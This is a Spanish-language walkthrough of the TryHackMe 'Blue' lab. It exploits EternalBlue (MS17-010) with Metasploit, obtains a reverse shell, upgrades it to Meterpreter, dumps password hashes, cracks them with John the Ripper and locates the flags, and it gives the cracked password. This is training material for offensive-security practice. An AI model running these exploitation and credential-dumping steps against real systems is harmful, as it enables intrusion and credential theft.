Blue [TryHackMe]

2023-08-27

Introducción

Se trata de la segunda máquina de la serie “Offensive Pentesting” de TryHackMe, que se centra en la explotación de la vulnerabilidad EternalBlue en sistemas Windows. Es una sala sencilla, destinada a familiarizarse con el reconocimiento, la explotación y el escalamiento de privilegios en sistemas Windows y en uso de Metasploit y Meterpreter.

Task 1 - Reconocimiento

Paso 1: Enumeración de Puertos

  • Realizo un escaneo de puertos con Nmap para identificar los puertos abiertos.
  • Descubro que el puerto 445 (SMB) estaba abierto en el objetivo.
  • Encuentro una vulnerabilidad conocida en el servicio SMB, MS17-010.

Comando Nmap:

nmap -sV --script vuln -p- 10.10.185.150

Task 2 - Explotación

Paso 2: Identificación de Vulnerabilidad

  • Investigo sobre la vulnerabilidad MS17-010 y su explotación potencial.
  • Busco el módulo “ms17_010_eternalblue” de Metasploit y lo selecciono.

Herramienta Metasploit:

use windows/smb/ms17_010_eternalblue

Paso 3: Explotación

  • Configuro Metasploit con mi dirección IP como host.
  • Ejecuto el exploit para obtener acceso en el sistema objetivo.
  • Consigo una shell inversa y la con Meterpreter.

Comandos Metasploit:

set RHOSTS 10.10.185.150
set LHOST <mi dirección IP>
exploit

Task 3 - Escalamiento de Privilegios

Paso 4: Escalamiento de Privilegios

  • Busco la manera de escalar privilegios y convertir la shell en una sesión de Meterpreter.
  • Utilizo el módulo “shell_to_meterpreter” de Metasploit para lograrlo.

Comandos Metasploit:

use post/multi/manage/shell_to_meterpreter
sessions
set SESSION <número de sesión>
exploit

Task 4 - Descifrando Contraseñas

Paso 5: Extracción de Contraseñas

  • Con Meterpreter, ejecuto el comando “hashdump” para extraer las contraseñas almacenadas en el sistema.

Comando Meterpreter:

hashdump

Paso 6: Descifrando Contraseña

  • Copio el hash de contraseña de un usuario no predeterminado y utilizo John the Ripper para descifrarlo.
  • La contraseña descifrada resultante es “alqfna22”.

Comandos John the Ripper:

john --wordlist=/usr/share/wordlists/rockyou.txt hashdump.txt --format=NT

Task 5 - Búsqueda de Banderas

Paso 7: Búsqueda de Banderas

  • Utilizo el comando “search” en Meterpreter para encontrar las ubicaciones de las banderas en el sistema.
  • Descubro las siguientes banderas:
    • c:\\flag1.txt (ubicada en la raíz del sistema)
    • c:\\Windows\\System32\\config\\flag2.txt (ubicada en la carpeta de configuración)
    • c:\\Users\\Jon\\Documents\\flag3.txt (ubicada en la carpeta de documentos de un usuario)

Comando Meterpreter:

search -f flag*.txt

Paso 8: Exploración de Banderas

  • Uso “cat” para mostrar el contenido de las banderas y encontrar las respuestas a las preguntas de la sala:

Comando Meterpreter:

cat c:\\flag1.txt

Conclusión

Se trata de una máquina muy sencilla, ya que se cubren los aspectos clave de la enumeración, la explotación de vulnerabilidades, el escalamiento de privilegios, la extracción y el descifrado de contraseñas, y la búsqueda de ficheros en sistemas Windows.

(◕‿‿◕) Hack the planet!